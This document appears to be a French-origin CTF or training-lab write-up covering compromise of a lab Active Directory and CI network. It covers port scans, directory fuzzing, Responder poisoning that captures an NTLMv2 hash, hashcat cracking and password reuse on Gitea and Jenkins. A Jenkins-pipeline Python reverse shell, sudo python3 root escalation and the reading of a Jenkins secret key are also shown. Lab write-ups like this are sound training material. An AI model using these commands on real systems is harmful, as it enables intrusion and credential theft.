SF:n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request");
MAC Address: BC:24:11:E7:C7:CF (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.57 seconds
```

| port | protocol | service |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) |
| 3000 | http | Gitea |

---

## [Info] nmap 192.168.0.100

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-27 21:06:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
54045/tcp open  msrpc         Microsoft Windows RPC
54053/tcp open  msrpc         Microsoft Windows RPC
54065/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/27%Time=66549389%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: BC:24:11:99:91:F7 (Unknown)
Service Info: Host: WIN-3OQBLK21T8G; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.72 seconds
```

| port | protocol | service |
|---|---|---|
| 53 | domain? | - |
| 88 | kerberos-sec | Microsoft Windows Kerberos (server time: 2024-05-27 21:06:58Z) |
| 135 | msrpc | Microsoft Windows RPC |
| 139 | netbios-ssn | Microsoft Windows netbios-ssn |
| 389 | ldap | Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) |
| 445 | microsoft-ds? | - |
| 464 | kpasswd5? | - |
| 593 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 636 | tcpwrapped | - |
| 3268 | ldap | Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) |
| 3269 | tcpwrapped | - |
| 3389 | ms-wbt-server | Microsoft Terminal Services |
| 5985 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| 9389 | mc-nmf | .NET Message Framing |
| 49664 | msrpc | Microsoft Windows RPC |
| 49669 | msrpc | Microsoft Windows RPC |
| 49671 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 54045 | msrpc | Microsoft Windows RPC |
| 54053 | msrpc | Microsoft Windows RPC |
| 54065 | msrpc | Microsoft Windows RPC |

---

## [Info] nmap 192.168.0.101

```bash
root@NewsLetter:/home/rebond# nmap -sV 192.168.0.101 -p 1-65000
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:57 UTC
Nmap scan report for 192.168.0.101
Host is up (0.00028s latency).
Not shown: 64998 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: BC:24:11:4F:8B:17 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.18 seconds
```

| port | protocol | service |
|---|---|---|
| 3389 | ms-wbt-server | Microsoft Terminal Services |
| 5985 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |

---

## [Info] nmap 192.168.0.200

```bash
root@NewsLetter:/home/rebond# nmap -sV 192.168.0.200 -p 1-65000
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:54 UTC
Nmap scan report for 192.168.0.200
Host is up (0.000085s latency).
Not shown: 64998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
9999/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
MAC Address: BC:24:11:07:76:DF (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.36 seconds
```

| port | protocol | service |
|---|---|---|
| 22 | ssh | OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0) |
| 9999 | http | Apache httpd 2.4.52 |

---

## [Info] 192.168.0.100: LDAP info

```bash
root@NewsLetter:/home/rebond# nmap --script=ldap-rootdse 192.168.0.100
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 14:19 UTC
Nmap scan report for 192.168.0.100
Host is up (0.00029s latency).
Not shown: 987 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=bubble,DC=dev
|       ldapServiceName: bubble.dev:win-3oqblk21t8g$@BUBBLE.DEV
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330 | supportedControl: 1.2.840.113556.1.4.2354 | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=bubble,DC=dev | serverName: CN=WIN-3OQBLK21T8G,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bubble,DC=dev | schemaNamingContext: CN=Schema,CN=Configuration,DC=bubble,DC=dev | namingContexts: DC=bubble,DC=dev | namingContexts: CN=Configuration,DC=bubble,DC=dev | namingContexts: CN=Schema,CN=Configuration,DC=bubble,DC=dev | namingContexts: DC=DomainDnsZones,DC=bubble,DC=dev | namingContexts: DC=ForestDnsZones,DC=bubble,DC=dev | isSynchronized: TRUE | highestCommittedUSN: 20702 | dsServiceName: CN=NTDS Settings,CN=WIN-3OQBLK21T8G,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bubble,DC=dev | dnsHostName: WIN-3OQBLK21T8G.bubble.dev | defaultNamingContext: DC=bubble,DC=dev | currentTime: 20240527212003.0Z |_ configurationNamingContext: CN=Configuration,DC=bubble,DC=dev 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 54045/tcp open unknown MAC Address: BC:24:11:99:91:F7 (Unknown) Service Info: Host: WIN-3OQBLK21T8G; OS: Windows Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds ``` --- ## [Info] Monter tunnel SSH Monter le tunnel ```bash ssh -o "ServerAliveInterval 30" -i privatekey -N (non-interactive) proxy-user@proxy-host -L (link port-port) local-port:host-destination:port-destination # Exemple: ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 3389:192.168.0.101:3389 ``` --- ## [Info] Se connecter en RDP via tunnel 
```bash
ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 3389:192.168.0.101:3389
```

Open `remmina`:

![image](https://hackmd.io/_uploads/B1wEoGzVR.png)

![image](https://hackmd.io/_uploads/rkyLiMME0.png)

---

## [Info] ffuf (directory listing) on 192.168.0.200 (via SSH tunnel)

```bash
$ ffuf -u http://localhost:9999/FUZZ -w /usr/share/wordlists/dirb/common.txt -fw 8

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://localhost:9999/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 8
________________________________________________

[Status: 200, Size: 6011, Words: 1178, Lines: 249, Duration: 14ms]
calc                    [Status: 200, Size: 6011, Words: 1178, Lines: 249, Duration: 11ms]
login                   [Status: 200, Size: 113, Words: 12, Lines: 4, Duration: 19ms]
mirror                  [Status: 200, Size: 103500, Words: 62, Lines: 12, Duration: 11ms]
register                [Status: 200, Size: 113, Words: 12, Lines: 4, Duration: 11ms]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 9ms]
:: Progress: [4614/4614] :: Job [1/1] :: 139 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
```

---

## [Flag] Hidden site on 192.168.0.200 (via SSH tunnel)

`FLAG{M1r01RM1r01R}`

> http://localhost:9999/mirror

![image](https://hackmd.io/_uploads/BJe13TXMN0.png)

---

## [Info] Enumerating domain users (via Kerberos)

| user | domain |
|---|---|
| administrator | bubble.dev |

```bash
root@NewsLetter:/home/rebond# nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='bubble.dev'" 192.168.0.100
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-28 09:09 UTC
Nmap scan report for 192.168.0.100
Host is up (0.00034s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|_    administrator@bubble.dev
MAC Address: BC:24:11:99:91:F7 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
```

---

## [Info] Enumerating Gitea users (192.168.0.81)

```xml
$ curl http://localhost:3000/explore/users/sitemap-1.xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://192.168.0.81:3000/localadm</loc>
    <lastmod>2024-05-24T20:45:53Z</lastmod>
  </url>
</urlset>
```

---

## [Info] Retrieving an AD user's credentials

| user | password | domain | hash |
|---|---|---|---|
| tomega | iamtheomega | bubble.dev | `tomega::BUBBLE:c91c3b887cd0a73a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` |

```bash
root@NewsLetter:~/kerbrute/Responder# python3 Responder.py -I eth0 -wF -v
[!] Error starting TCP server on port 80, check permissions or other servers running.
[!] Error starting TCP server on port 25, check permissions or other servers running.
[*] [NBT-NS] Poisoned answer sent to 192.168.0.101 for name TOTO (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.0.101 for name toto.local
[*] [MDNS] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto.local
[*] [MDNS] Poisoned answer sent to 192.168.0.101 for name toto.local
[*] [LLMNR] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto
[*] [MDNS] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto.local
[*] [LLMNR] Poisoned answer sent to 192.168.0.101 for name toto
[*] [LLMNR] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto
[*] [LLMNR] Poisoned answer sent to 192.168.0.101 for name toto
[SMB] NTLMv2-SSP Client   : fe80::dd0e:5afb:9a8c:a89b
[SMB] NTLMv2-SSP Username : BUBBLE\tomega
[SMB] NTLMv2-SSP Hash     : tomega::BUBBLE:c91c3b887cd0a73a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
```

```bash
$ hashcat -m 5600 -a 0 -o cracked.txt hash.txt /home/kali/Downloads/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i7-10870H CPU @ 2.20GHz, 1436/2937 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache building /home/kali/Downloads/rockyou.txt: 33553435 bytes (2
Dictionary cache built:
* Filename..: /home/kali/Downloads/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TOMEGA::BUBBLE:c91c3b887cd0a73a:afaec37f2937d265bc6...000000
Time.Started.....: Tue May 28 14:46:50 2024 (8 secs)
Time.Estimated...: Tue May 28 14:46:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Downloads/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   944.6 kH/s (0.43ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7475200/14344384 (52.11%)
Rejected.........: 0/7475200 (0.00%)
Restore.Point....: 7474176/14344384 (52.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ian**cons -> iamsospecial
Hardware.Mon.#1..: Util: 55%

Started: Tue May 28 14:46:24 2024
Stopped: Tue May 28 14:47:00 2024
```

Result:

```bash
└─$ cat cracked.txt
TOMEGA::BUBBLE:c91c3b887cd0a73a:afaec37f2937d265bc63b6896bb5ca92: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:iamtheomega
```

---

## [Flag] Nmap 192.168.0.123

`FLAG{8uBb1es3v3rywh3re}`

The flag is found by running nmap (line 1140):

```bash
nmap -sV 192.168.0.123 -p 1-65000
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-29 08:11 UTC
Nmap scan report for 192.168.0.123
Host is up (0.000010s latency).
Not shown: 64997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Bubble Web Server 3.0
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=5/29%Time=6656E320%P=x86_64-pc-linux-gnu%r(NULL
SF:,1CD,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\.
SF:0\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n<p
SF:>\ndvztjmff\x20laxhummx\x20qlxzpnsl\x20rqylvzkb\x20xjugxzni\x20blqvzcup
SF:\x20qurhhjty\x20btlxuxar\x20guzdvnlw\x20ydtzinry\x20\n</p>\n<p>\njihqtc
SF:qw\x20xbvsyvlg\x20rllmyzky\x20efxmvome\x20yuxtypqw\x20tlqthbaa\x20mnpmo
SF:bkt\x20hkfeaskz\x20ohumzkks\x20yclhenhs\x20\n</p>\n<p>\ndwhryrkh\x20dsn
SF:ekxfa\x20hzogmzak\x20bnrhbycg\x20xjxxckgg\x20ctmoqroz\x20scfedhoh\x20vf
SF:qygsed\x20bdagpgmr\x20bahtrxtj\x20\n</p>\n<!--Page\x20served\x20by\x20B
SF:ubble\x20Web\x20Server\x203\.00--></body>\n</html>\n")%r(TLSSessionReq,
SF:216,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\.0
SF:\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n<h1
SF:>FLAG{8uBb1es3v3rywh3re}</h1>\n<p>\nrta\x20jie\x20pwf\x20snv\x20qcy\x20
SF:jqb\x20\n</p>\n<p>\najg\x20ivs\x20wiu\x20pqu\x20bhq\x20bsy\x20\n</p>\n<
SF:p>\nhjx\x20nbm\x20itq\x20icj\x20jes\x20rmq\x20\n</p>\n<p>\nmly\x20gaq\x
SF:20cbz\x20ser\x20tmb\x20sze\x20\n</p>\n<p>\nejy\x20vra\x20gbh\x20asv\x20
SF:qeg\x20rmj\x20\n</p>\n<p>\nhrm\x20jjt\x20aef\x20dwg\x20idp\x20gag\x20\n
SF:</p>\n<p>\nigj\x20pge\x20lxk\x20tqx\x20ezo\x20tiz\x20\n</p>\n<p>\nmlg\x
SF:20toc\x20bwf\x20qeh\x20ynn\x20kcw\x20\n</p>\n<p>\nopt\x20yjl\x20xpk\x20
SF:nit\x20nue\x20vpu\x20\n</p>\n<p>\nzqt\x20hix\x20ohm\x20ctr\x20yhg\x20th
SF:r\x20\n</p>\n<!--Page\x20served\x20by\x20Bubble\x20Web\x20Server\x203\.
SF:00--></body>\n</html>\n");
MAC Address: BC:24:11:A8:99:68 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

---

## [Flag] Text file on the desktop (192.168.0.101)

`FLAG{P4t1C13Nc31SEv3R1tH1nG}`

> C:\Users\tomega\Desktop\Enquete.txt

![image](https://hackmd.io/_uploads/HyCGfIm40.png)

```
FLAG{P4t1C13Nc31SEv3R1tH1nG}

Je suis en pleine enquete sur la personne qui administre mon ordinateur. Je pense que c'est lui qui vole des bulles dans le stock de bulles !
Il faudrait que j'ai acces a son compte mais aucune idee de comment faire...
J'ai bien un collegue qui m'a donne le fichier BUUUULLLLLEEEEEESSS.txt sur mon bureau en me disant que je trouverais la reponse a toutes mes questions dedans mais j'ai l'impression qu'il a juste consomme trop de bulles.....
```

---

## [Flag] Hidden file in a user's directory

`FLAG{H1dD3nF1l3Sr34Lly?}`

| Label | Presumed meaning | Original | Decoded |
|---|---|---|---|
| f | Flag | `RkxBR3tIMWREM25GMWwzU3IzNExseT99Cg==` | `FLAG{H1dD3nF1l3Sr34Lly?}` |
| adm | Administrator | `SkFET1JFTEVTQlVMTEVTCg==` | `JADORELESBULLES` |

> C:\Users\Public\Public Bubbles\.hidden.txt

![image(1)](https://hackmd.io/_uploads/Sysl3LmNA.png)

![image(2)](https://hackmd.io/_uploads/HJgZ2LQVC.png)

```
f:RkxBR3tIMWREM25GMWwzU3IzNExseT99Cg==
adm:SkFET1JFTEVTQlVMTEVTCg==
```

![image](https://hackmd.io/_uploads/rJxbLL74C.png)

```
FLAG{H1dD3nF1l3Sr34Lly?}
JADORELESBULLES
```

---

## [Flag] File on the desktop of 192.168.0.101 (AD)

`FLAG{M0i4u5SiJ4d0R3L3sBuLl35}`

> C:\Users\Administrator\Desktop\flag.txt

![image](https://hackmd.io/_uploads/B1UfDLmNA.png)

```
FLAG{M0i4u5SiJ4d0R3L3sBuLl35}
```

---

## [Info] [Vulnerability - same password] Obtaining localadm's credentials (on Gitea)

| user | password |
|---|---|
| localadm | iamtheomega |

![image](https://hackmd.io/_uploads/rkFtJ_mN0.png)

![image](https://hackmd.io/_uploads/ByA5ydQNC.png)

![image](https://hackmd.io/_uploads/ByPp1dXER.png)

---

## [Info] [Vulnerability - same password] Obtaining localadm's credentials (on Jenkins)

- Same as on Gitea for the `localadm` user

| user | password |
|---|---|
| localadm | iamtheomega |

---

## [Info] [Vulnerability - CE - privilege escalation] Jenkins pipeline to root on 192.168.0.80

```
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.2",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```

![image](https://hackmd.io/_uploads/BkAdkYXVA.png)

![image](https://hackmd.io/_uploads/S1YCouXEA.png)

![image](https://hackmd.io/_uploads/SJSXndENR.png)

```bash
$ ssh -o "ServerAliveInterval 30" -i rebond-privkey rebond@infra-05.ipssi.cloud
Enter passphrase for key 'rebond-privkey':
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.8.4-3-pve x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

Last login: Tue May 28 15:15:05 2024 from 192.168.0.1
rebond@NewsLetter:~$ sudo python3 -c 'import os; os.system("su root")'
root@NewsLetter:/home/rebond# nc -lvnp 4242
Listening on 0.0.0.0 4242
Connection received on 192.168.0.80 55808
$
$ pwd
pwd
/var/lib/jenkins/workspace/ContinuousIntegration
$ sudo -l
sudo -l
Matching Defaults entries for jenkins on JenkinsCI:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jenkins may run the following commands on JenkinsCI:
    (root) NOPASSWD: /usr/bin/python3
$ sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")'
sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")'
root@JenkinsCI:/#
```

---

## [Info] Secret key in Jenkins on 192.168.0.80

> /var/lib/jenkins/secret.key

`424368059590d35e0152cedf07afd96376548a52bd714eebaa089f452fb5dd76`

```bash
root@JenkinsCI:~# cat /var/lib/jenkins/secret.key
cat /var/lib/jenkins/secret.key
424368059590d35e0152cedf07afd96376548a52bd714eebaa089f452fb5dd76
```

---

## [Flag] 192.168.0.100 flag.txt

`FLAG{S0fCk1nEz??????}`

> C:\Users\Administrator\Desktop\flag.txt

![image](https://hackmd.io/_uploads/Sy880_74C.png)

---

## [Flag] 192.168.0.123 8080/config.php

`FLAG{0hMyLF1!!}`

http://127.0.0.1:8080/config.php

```bash
gobuster dir --url http://localhost:8080/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x php,html,css,js,sh,old,bac
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://localhost:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              js,sh,old,bac,php,html,css
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta.html            (Status: 403) [Size: 276]
/.hta.js              (Status: 403) [Size: 276]
/.hta                 (Status: 403) [Size: 276]
/.hta.bac             (Status: 403) [Size: 276]
/.hta.sh              (Status: 403) [Size: 276]
/.hta.php             (Status: 403) [Size: 276]
/.hta.old             (Status: 403) [Size: 276]
/.hta.css             (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htaccess.old        (Status: 403) [Size: 276]
/.htaccess.bac        (Status: 403) [Size: 276]
/.htaccess.sh         (Status: 403) [Size: 276]
/.htaccess.css        (Status: 403) [Size: 276]
/.htaccess.php        (Status: 403) [Size: 276]
/.htaccess.html       (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess.js         (Status: 403) [Size: 276]
/.htpasswd.sh         (Status: 403) [Size: 276]
/.htpasswd.js         (Status: 403) [Size: 276]
/.htpasswd.bac        (Status: 403) [Size: 276]
/.htpasswd.php        (Status: 403) [Size: 276]
/.htpasswd.old        (Status: 403) [Size: 276]
/.htpasswd.css        (Status: 403) [Size: 276]
/.htpasswd.html       (Status: 403) [Size: 276]
/admin.php            (Status: 200) [Size: 72]
/admin.php            (Status: 200) [Size: 72]
/config.php           (Status: 200) [Size: 69]
/index.php            (Status: 200) [Size: 4340]
/index.html           (Status: 200) [Size: 10671]
/index.html           (Status: 200) [Size: 10671]
/index.php            (Status: 200) [Size: 4340]
/server-status        (Status: 403) [Size: 276]
Progress: 37816 / 37816 (100.00%)
```

![image](https://hackmd.io/_uploads/r13TPdV4R.png)

```bash
$ curl http://localhost:8080/config.php
//FLAG{0hMyLF1!!}
//Head of cybersecurity password: uoddsfhhbhkdhhh8
```

---

## [Flag] Comment in 8080/index.php

http://127.0.0.1:8080/index.php

`FLAG{4h...C0mm3nts...}`

![image](https://hackmd.io/_uploads/SyXQfOV4R.png)

```html
$ curl http://localhost:8080/index.php
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secte de la Bulle</title>
    <style>
        body { font-family: Arial, sans-serif; background-color: #f0f8ff; color: #333; margin: 0; padding: 0; }
        .navbar { background-color: #4682b4; overflow: hidden; }
        .navbar a { float: left; display: block; color: white; text-align: center; padding: 14px 20px; text-decoration: none; }
        .navbar a:hover { background-color: #5f9ea0; }
        .content { padding: 20px; }
        h1 { color: #4682b4; }
